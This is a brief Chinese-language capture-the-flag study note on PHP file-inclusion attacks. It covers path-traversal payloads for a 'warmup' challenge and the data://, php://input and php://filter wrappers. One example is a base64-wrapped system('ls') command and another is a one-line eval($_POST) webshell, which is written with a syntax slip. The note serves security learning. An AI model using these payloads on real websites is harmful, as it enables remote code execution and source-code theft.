敏感函数
require()
require_once()
include()
include_once()

warmup
源码中有?截断

payload:source.php?file=hint.php?../../../../../../ffffllllaaaagggg 

data伪协议
当php等字符被过滤时
标准姿势

data://text/plain;base64,xxxx

xxxx是类似<?php system("ls");?>形式代码的base64编码
<?php eval($_POST[a];?)>也可以

php://input伪协议

?get=php://input

可以再post传入相应的值或php语句

php://filter伪协议
常用

index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

得到的需要再进行一个base64解码

例如ACTF2020新生赛